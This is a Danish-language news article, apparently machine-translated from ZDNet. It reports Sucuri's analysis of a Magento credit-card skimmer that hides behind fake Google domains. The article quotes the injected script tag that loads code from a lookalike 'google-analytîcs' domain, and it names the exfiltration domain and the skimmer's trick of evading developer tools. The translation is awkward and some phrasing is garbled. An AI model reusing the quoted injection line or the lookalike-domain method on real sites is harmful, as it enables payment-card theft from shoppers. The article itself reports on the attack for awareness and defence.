Ondsindede ‘Google’, de domæner, der anvendes i Magento kort skimmer angreb

0
166

Google ‘ s Byteboard har til formål at tage smerten ud af leje for ledere og kandidater
Den eksperimentelle værktøj er beregnet til at hjælpe med at gøre at finde en ny programmør, der har lidt lettere.

Trussel aktører er ved hjælp af falske, men overbevisende Google-domæner for at narre besøgende til at tro, at inficerede websteder er sikre, når de foretager online-transaktioner.

På torsdag, forskere fra Sucuri sagde i en nylig sag, er indberettet af en Magento hjemmeside ejer et domæne, var blevet smittet med et kreditkort skimmer at gøre brug af JavaScript-kode, der indeholder et link til skadelig internationaliserede google-analytîcs[.]kom hjemmeside-adresse.

Et eksempel på koden nedenfor:

< script type=” text/javascript ” src =” //google-analytîcs.com/www.[redigeret].com/3f5cf4657d5d9.js ” > < /script>

“Besøgende kan se et velrenommeret navn (som “Google”) i anmodninger og antage, at de er sikre at indlæse, uden at lægge mærke til, at domænet er ikke et perfekt match og det er faktisk ondsindet i naturen,” siger forskerne.

TechRepublic: 60% af virksomhederne oplevet insider-angreb i det sidste år

Hjemmesiden ejer blev gjort opmærksom på et problem, efter at blive sortlistet. Sucuri ‘ s undersøgelse viste data capture element af kortet skimmer er lig andre i naturen og bruger Javascript til at skjult vandlås og gemme alle input data samt drop-down menuen valg.

Men den kode, der vil ændre taktik afhængig af om developer tools i enten Google Chrome eller Mozilla Firefox browser er i brug. Den skummer ikke vil forsøge at få fat i alle oplysninger i disse scenarier, er der sandsynligvis et forsøg på at undgå afsløring.

CNET: Rusland målrettet valg-systemer i alle 50 stater, Senatets rapport siger

Kortet skimmer understøtter “snesevis” af betaling gateways, Sucuri siger, og hvis det udvikler værktøjer, der ikke er registreret, stjålne oplysninger er sendt til en ekstern server-igen forklædt med en anden svigagtig domæne, google[.]ssl[.]lnfo[.]cc.

Se også: AMERIKANSKE AG Barr krav tech virksomheder bryde den kryptering, ‘det kan og skal gøres”

Kort hulskeer, der er installeret gennem sårbar over for e-handel hjemmesider, er en udbredt forekomst. I juli, RiskIQ sagde en nyere “spray-and-pray” – kampagnen viste sig at være en succes for den Magecart hacking gruppen, der havde formået at inficere over 17.000 hjemmesider med kort-skimming malware på blot et par måneder.

Magento brugere, på samme måde som WordPress og Drupal, er altid rådes til at holde deres software bygger op-til-dato. Magento domæner er et fælles mål om at cyberattackers søger at høste økonomiske data, med en anslået 83 procent af Magento websteder, som er rapporteret som sårbare over for forplove i 2018.

ZDNet har nået ud til at Google, og vil opdatere, hvis vi hører tilbage.

Tidligere og relaterede dækning

Google renser ud stalker, spyware apps fra Play Butik
Over 23 millioner stjålne kreditkort bliver handlet på den Mørke Web
UK, EU ‘ s politi-pilotprojekt for at give vildfarne teenager hackere hvide hatte

Har du et tip? Komme i kontakt sikkert via WhatsApp | Signal på +447713 025 499, eller over på Keybase: charlie0

Relaterede Emner:

Sikkerhed-TV

Data Management

CXO

Datacentre